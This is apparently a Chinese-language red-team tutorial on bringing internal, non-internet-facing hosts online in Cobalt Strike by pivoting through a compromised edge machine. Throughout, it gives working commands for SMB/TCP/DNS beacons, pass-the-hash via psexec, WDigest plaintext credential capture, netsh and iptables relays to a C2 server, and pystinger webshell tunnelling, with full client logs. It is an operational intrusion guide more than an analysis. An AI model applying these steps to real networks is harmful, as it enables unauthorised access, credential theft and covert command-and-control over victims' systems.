不出网上线CS的各种姿势（内网横向）

情况一：存在一台中转机器

存在一台中转机器，这台机器出网，这种是最常见的情况。

经常是拿下一台边缘机器，其有多块网卡，用于连接内外网，内网机器都不出网。这种情况下拿这个边缘机器做中转，就可以上线。因为内网机器不出网，所以就算被种马，也上不了线，应为木马反弹回去的时候出不了网。

拓扑大致如下:

上线方法一：SMB Beacon

大致流程：

首先要拿下边缘服务器，然后使用边缘服务器当代理，进入内网服务器，并上传木马。

怎么通过边缘服务器进行代理呢？

通过在边缘服务器和内网服务器之间建立隧道（Beacon SMB/TCP），但是建立隧道要有内网服务器的权限（管理员账号密码），怎么获取呢，有以下两种思路：

1.内网服务器部署了其他服务，通过这些服务来进行入侵，然后提权；

2.内网横向，但是不知道内网服务器管理员的账号密码，所以要对账号密码进行合理的猜测，一般管理员为缓解对账号密码的记录，会将账号和密码设为同一个，我们已经拿下边缘服务器，那么使用边缘服务器的账号密码进行登录入侵。

抓取密码---CS

明文密码抓取：由于微软的补丁已经不允许抓取明文密码了，但是我们可以通过修改注册表来让Wdigest Auth保存明文密码（具体流程参考：cs与msf权限传递，以及mimikatz抓取win2012明文密码_cs与msf权限传递,以及mimikatz抓取win2012明文密码-CSDN博客）

密文密码：可以通过hashdump来抓取，然后通过passhash进行认证

passhash原理：windows存在Winlogon.exe这个进程会将明文的账号密码传递给下一个进程Lsass.exe，该进程会对明文密码进行加密，并存储一份在该进程中，然后加密后的密码存储到SAM文件中，然后下一次登录时会和该存储的密文进行对比。

使用passhash，需要知道内网中有几台机器，可以用namp进行扫描，也可以使用CS提供的port scan（端口扫描）

隧道建立后就可以用copy命令将木马文件传递到内网服务器的共享文件中去，至此，成功横传成功。

介绍

官网介绍：SMB Beacon使用命名管道通过父级Beacon进行通讯，当两个Beacons连接后，子Beacon从父Beacon获取到任务并发送。

因为连接的Beacons使用Windows命名管道进行通信，此流量封装在SMB协议中，所以SMB Beacon相对隐蔽，绕防火墙时可能发挥奇效。

使用

这种Beacon要求具有SMB Beacon的主机必须接受端口445上的连接。

派生一个SMB Beacon方法：在Listner生成SMB Beacon>目标主机>右键> spawn >选中对应的Listener>上线

或在Beacon中使用命令spawn smb（smb为我的smb listener名字）

使用插件，或自带端口扫描，扫描内网机器

转到视图，选择目标

使用psexec

选择一个hash，选择smb 监听器和对应会话

即可上线

运行成功后外部可以看到∞∞这个字符，这就是派生的SMB Beacon。

当前是连接状态，你可以Beacon上用link <ip>命令链接它或者unlink <ip>命令断开它。

这种Beacon在内网横向渗透中运用的很多。在内网环境中可以使用ipc $生成的SMB Beacon上传到目标主机执行，但是目标主机并不会直接上线的，需要我们自己用链接命令(link <ip>)去连接它。

上线方法二：中转listener(Reverse TCP Beacon)

其实和方法一是类似的

以下内容会自动配置

然后和上面方法一一样，发现内网主机且知道账号密码,psexec横向传递，选择中转listener

上线方法三：HTTP 代理

中转机器不需要上线即可

使用goproxy项目做代理，项目地址：

代码语言：javascript

复制

https://github.com/snail007/goproxy

过程：

1.上传proxy.exe到web服务器(边缘主机)，在8080端口开启http代理

代码语言：javascript

复制

C:\proxy.exe http -t tcp -p "0.0.0.0:8080" --daemon

2.用netsh命令将访问内网ip 192.168.111.131的822端口(必须为未使用的端口，否则会失败)的流量重定向到外网ip 192.168.1.88的8080端口

代码语言：javascript

复制

netsh interface portproxy add v4tov4 listenaddress=192.168.111.131 listenport=822 connectaddress=192.168.1.88 connectport=8080

3.创建listener，配置如下

4.生成stageless payload，在业务服务器上执行，成功上线

连接过程

代码语言：javascript

复制

192.168.111.236  → 192.168.111.131:822→ 192.168.1.88:8080→ C2(192.168.1.89)

上线方法四、TCP Beacon(正向)

正向连接
和SMB Beacon比较类似。也需要一个父beacon
SMB Beacon，TCP Beacon 与 Cobalt Strike 中派生 payload 的大多数动作相兼容。除了一些要求显式 stager 的用户驱动的攻击（比如：Attacks → Packages 、 Attacks → Web Drive-by ）。

测试：

生成一个tcp beacon

使用该beacon生成一个stageless形式的木马：

上传到目标机器运行：

在中转机器的Beacon里使用connect [ip address] [port]命令进行正向连接，即可上线：

要销毁一个 Beacon 链接，在父会话或子会话的控制台中使用 unlink [ip address] [session PID] 。以后，你可以从同一主机（或其他主机）重新连接到 TCP Beacon。

上线方法五、使用pystinger进行代理转发

pystinger的详细使用见下面章节。这里仅简单演示一下：

一般不会将pystinger用在这种场景下

测试环境：

攻击机kali：192.168.1.35

web服务器：192.168.1.70、192.168.111.129

业务服务器：192.168.111.236

过程：

1.上传proxy.php到WEB服务器网站目录，正常访问返回UTF-8

web服务器外网ip为192.168.1.70

上传stinger_server.exe，执行

代码语言：javascript

复制

start stinger_server.exe 0.0.0.0

攻击机(192.168.1.89)上执行

代码语言：javascript

复制

./stinger_client -w http://192.168.1.70/proxy.php -l 127.0.0.1 -p 60000

此时已经将web服务器的60020端口转发到vps的60020端口上了

CS设置监听,HTTP Hosts为中转机器的内网ip，端口为60020：

使用psexec横向移动，选择listener为pystinger，或者直接生成payload在业务主机执行，业务内网主机192.168.111.236即可成功上线：

补充：中转机器为Linux

HTTP代理(中转机器不需要上线即可)

使用方法与上面方法三一样。只不过要使用iptables转发：

代码语言：javascript

复制

echo 1 >/proc/sys/net/ipv4/ip_forward

代码语言：javascript

复制

iptables -A PREROUTING -p tcp -d 192.168.111.131 --dport 822 -j DNAT --to-destination 192.168.1.88:8080

iptables -A POSTROUTING -p tcp -d 192.168.1.88 --dport 8080 -j SNAT --to-source 192.168.111.131:822

测试：

生成stageless payload，在目标机器上执行，成功上线

使用pystinger进行代理转发

和上面上线方法五一样，建立pystinger连接之后，直接生成payload在业务主机执行，业务内网主机192.168.111.236即可成功上线。。

CrossC2

通过其他机器的Beacon可以直接上线Linux机器

CrossC2使用

用来上线Linux或MacOS机器

项目地址：【一定要下载对应版本的】

代码语言：javascript

复制

https://github.com/gloxec/CrossC2

配置：

(我这里在Windows上运行的teamserver)

创建个https监听：

生成个payload

(用其他方式也可以)

如果生成不了，也可以直接命令行生成

生成之后，上传到Linux机器，运行，即可上线：

安装CrossC2Kit插件，丰富beacon的功能

内网机器上线CS:

中转的Linux机器上线之后，即可用上面的方法来上线内网机器。

TCP Beacon：

上传到目标机器运行。

然后在Linux beacon下连接：

上线之后是个黑框，checkin一下就可以了

情况二：边缘机器只有DNS协议出网

DNS上线CS

一、准备工作

1）域名，godaddy ：yokan.xxx2）vps，防火墙开放UDP端口53 : 82.xxx.xxx.19

3）cobalt strike 4.1

二、域名设置

1）设置解析

配置A记录设置成vps的ip，cs也配置在vps上

配置几个ns记录指向刚刚A记录对应的域名

配置完成之后ping test.yokan.xxx可以ping通

vps上查看53端口占用情况，停掉vps的53端口服务

systemctl stop systemd-resolved

2）cs设置监听

![image-

都是ns记录的域名，DNS Host(Stager)随便选择其中一个就可以。

3）nslookup查看，成功解析：

注意：响应的地址74.125.196.113，这个是跟profile里设置的

三、cs上线

生成cs的stageless上线马，执行上线

stageless 马 dns有x64版本 , stager没有

上线之后是黑框，需要使用checkin命令让dns beacon强制回连teamserver

PS:需要多等一会

这样就可以正常交互了：

情况三：边缘机器不出网

方法一、TCP Beacon 正向连接

应用场景：边缘机器各种协议均不出网，但是可以正向访问到。

使用：

先让自己的攻击机上线

然后，如"上线方法四"一样，使用TCP Beacon生成一个stageless形式的木马，上传到目标机器，并运行。

在攻击机(中转机器)的Beacon里使用connect [ip address] [port]命令进行正向连接，即可上线：

方法二、使用pystinger(毒刺)工具

应用场景：边缘机器各种协议均不出网，但是存在web服务，已经拿到webshell。

项目地址:

代码语言：javascript

复制

https://github.com/FunnyWolf/pystinger

简单原理：

Pystinger来实现内网反向代理，利用http协议将目标机器端口映射至cs服务端监听端口，能在只能访问web服务且不出网的情况下可以使其上线cs

（图源网络）

使用

地址:

代码语言：javascript

复制

https://github.com/FunnyWolf/pystinger/blob/master/readme_cn.md

这里直接复制过来了：

假设不出网服务器域名为 http://example.com:8080 ,服务器内网IP地址为192.168.3.11

SOCK4代理

proxy.jsp上传到目标服务器,确保 http://example.com:8080/proxy.jsp 可以访问,页面返回 UTF-8
将stinger_server.exe上传到目标服务器,蚁剑/冰蝎执行start D:/XXX/stinger_server.exe启动服务端

不要直接运行D:/XXX/stinger_server.exe,会导致tcp断连

vps执行./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
如下输出表示成功

代码语言：javascript

复制

root@kali:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
2020-01-06 21:12:47,674 - INFO - 622 - Local listen check pass
2020-01-06 21:12:47,674 - INFO - 623 - Socks4a on 127.0.0.1:60000
2020-01-06 21:12:47,674 - INFO - 628 - WEBSHELL checking ...
2020-01-06 21:12:47,681 - INFO - 631 - WEBSHELL check pass
2020-01-06 21:12:47,681 - INFO - 632 - http://example.com:8080/proxy.jsp
2020-01-06 21:12:47,682 - INFO - 637 - REMOTE_SERVER checking ...
2020-01-06 21:12:47,696 - INFO - 644 - REMOTE_SERVER check pass
2020-01-06 21:12:47,696 - INFO - 645 - --- Sever Config ---
2020-01-06 21:12:47,696 - INFO - 647 - client_address_list => []
2020-01-06 21:12:47,696 - INFO - 647 - SERVER_LISTEN => 127.0.0.1:60010
2020-01-06 21:12:47,696 - INFO - 647 - LOG_LEVEL => INFO
2020-01-06 21:12:47,697 - INFO - 647 - MIRROR_LISTEN => 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 647 - mirror_address_list => []
2020-01-06 21:12:47,697 - INFO - 647 - READ_BUFF_SIZE => 51200
2020-01-06 21:12:47,697 - INFO - 673 - TARGET_ADDRESS : 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 677 - SLEEP_TIME : 0.01
2020-01-06 21:12:47,697 - INFO - 679 - --- RAT Config ---
2020-01-06 21:12:47,697 - INFO - 681 - Handler/LISTEN should listen on 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 683 - Payload should connect to 127.0.0.1:60020
2020-01-06 21:12:47,698 - WARNING - 111 - LoopThread start
2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:60000
2020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept

此时已经在vps127.0.0.1:60000启动了一个example.com所在内网的socks4a代理
此时已经将目标服务器的127.0.0.1:60020映射到vps的127.0.0.1:60020

cobalt strike单主机上线

proxy.jsp上传到目标服务器,确保 http://example.com:8080/proxy.jsp 可以访问,页面返回 UTF-8
将stinger_server.exe上传到目标服务器,蚁剑/冰蝎执行start D:/XXX/stinger_server.exe启动服务端

不要直接运行D:/XXX/stinger_server.exe,会导致tcp断连

stinger_client命令行执行./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
如下输出表示成功

代码语言：javascript

复制

root@kali:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
2020-01-06 21:12:47,674 - INFO - 622 - Local listen check pass
2020-01-06 21:12:47,674 - INFO - 623 - Socks4a on 127.0.0.1:60000
2020-01-06 21:12:47,674 - INFO - 628 - WEBSHELL checking ...
2020-01-06 21:12:47,681 - INFO - 631 - WEBSHELL check pass
2020-01-06 21:12:47,681 - INFO - 632 - http://example.com:8080/proxy.jsp
2020-01-06 21:12:47,682 - INFO - 637 - REMOTE_SERVER checking ...
2020-01-06 21:12:47,696 - INFO - 644 - REMOTE_SERVER check pass
2020-01-06 21:12:47,696 - INFO - 645 - --- Sever Config ---
2020-01-06 21:12:47,696 - INFO - 647 - client_address_list => []
2020-01-06 21:12:47,696 - INFO - 647 - SERVER_LISTEN => 127.0.0.1:60010
2020-01-06 21:12:47,696 - INFO - 647 - LOG_LEVEL => INFO
2020-01-06 21:12:47,697 - INFO - 647 - MIRROR_LISTEN => 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 647 - mirror_address_list => []
2020-01-06 21:12:47,697 - INFO - 647 - READ_BUFF_SIZE => 51200
2020-01-06 21:12:47,697 - INFO - 673 - TARGET_ADDRESS : 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 677 - SLEEP_TIME : 0.01
2020-01-06 21:12:47,697 - INFO - 679 - --- RAT Config ---
2020-01-06 21:12:47,697 - INFO - 681 - Handler/LISTEN should listen on 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 683 - Payload should connect to 127.0.0.1:60020
2020-01-06 21:12:47,698 - WARNING - 111 - LoopThread start
2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:60000
2020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept

cobalt strike添加监听,端口选择输出信息RAT Config中的Handler/LISTEN中的端口(通常为60020),beacons为127.0.0.1
生成payload,上传到主机运行后即可上线

cobalt strike多主机上线

proxy.jsp上传到目标服务器,确保 http://example.com:8080/proxy.jsp 可以访问,页面返回 UTF-8
将stinger_server.exe上传到目标服务器,蚁剑/冰蝎执行 start D:/XXX/stinger_server.exe 192.168.3.11 启动服务端

192.168.3.11可以改成0.0.0.0

stinger_client命令行执行./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
如下输出表示成功

代码语言：javascript

复制

root@kali:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
2020-01-06 21:12:47,674 - INFO - 622 - Local listen check pass
2020-01-06 21:12:47,674 - INFO - 623 - Socks4a on 127.0.0.1:60000
2020-01-06 21:12:47,674 - INFO - 628 - WEBSHELL checking ...
2020-01-06 21:12:47,681 - INFO - 631 - WEBSHELL check pass
2020-01-06 21:12:47,681 - INFO - 632 - http://example.com:8080/proxy.jsp
2020-01-06 21:12:47,682 - INFO - 637 - REMOTE_SERVER checking ...
2020-01-06 21:12:47,696 - INFO - 644 - REMOTE_SERVER check pass
2020-01-06 21:12:47,696 - INFO - 645 - --- Sever Config ---
2020-01-06 21:12:47,696 - INFO - 647 - client_address_list => []
2020-01-06 21:12:47,696 - INFO - 647 - SERVER_LISTEN => 127.0.0.1:60010
2020-01-06 21:12:47,696 - INFO - 647 - LOG_LEVEL => INFO
2020-01-06 21:12:47,697 - INFO - 647 - MIRROR_LISTEN => 192.168.3.11:60020
2020-01-06 21:12:47,697 - INFO - 647 - mirror_address_list => []
2020-01-06 21:12:47,697 - INFO - 647 - READ_BUFF_SIZE => 51200
2020-01-06 21:12:47,697 - INFO - 673 - TARGET_ADDRESS : 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 677 - SLEEP_TIME : 0.01
2020-01-06 21:12:47,697 - INFO - 679 - --- RAT Config ---
2020-01-06 21:12:47,697 - INFO - 681 - Handler/LISTEN should listen on 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 683 - Payload should connect to 192.168.3.11:60020
2020-01-06 21:12:47,698 - WARNING - 111 - LoopThread start
2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:60000
2020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept

cobalt strike添加监听,端口选择RAT Config中的Handler/LISTEN中的端口(通常为60020),beacons为192.168.3.11(example.com的内网IP地址)
生成payload,上传到主机运行后即可上线
横向移动到其他主机时可以将payload指向192.168.3.11:60020即可实现出网上线

定制Header及proxy

如果webshell需要配置Cookie或者Authorization,可通过--header参数配置请求头

代码语言：javascript

复制

--header "Authorization: XXXXXX,Cookie: XXXXX"

如果webshell需要通过代理访问,可通过--proxy设置代理

代码语言：javascript

复制

--proxy "socks5:127.0.0.1:1081"

测试

攻击机：192.168.1.89

假设我们在拿下一台目标主机，但是无法连接外网。

使用 pystinger 工具进行 CS 上线，下载地址，通过 webshell 实现内网 SOCK4 代理，端口映射可以使目标不出网情况下在 CS 上线。

首先上传对应版本脚本到目标服务器。

将stinger_server.exe上传到目标服务器,蚁剑/冰蝎执行start stinger_server.exe启动服务端

把 stinger_client 上传到 teamserver 服务器，-w 指定 proxy 的 url 地址运行。

代码语言：javascript

复制

chmod +x stinger_client
./stinger_client -w http://192.168.1.70/proxy.php -l 127.0.0.1 -p 60000

CS 新建监听器，设置为目标机器的内网 IP，端口默认 60020。(teamserver 服务器和执行 stinger_client 应为同一台服务器)

生成木马，上传目标服务器并执行。可看到 CS 有新上线主机。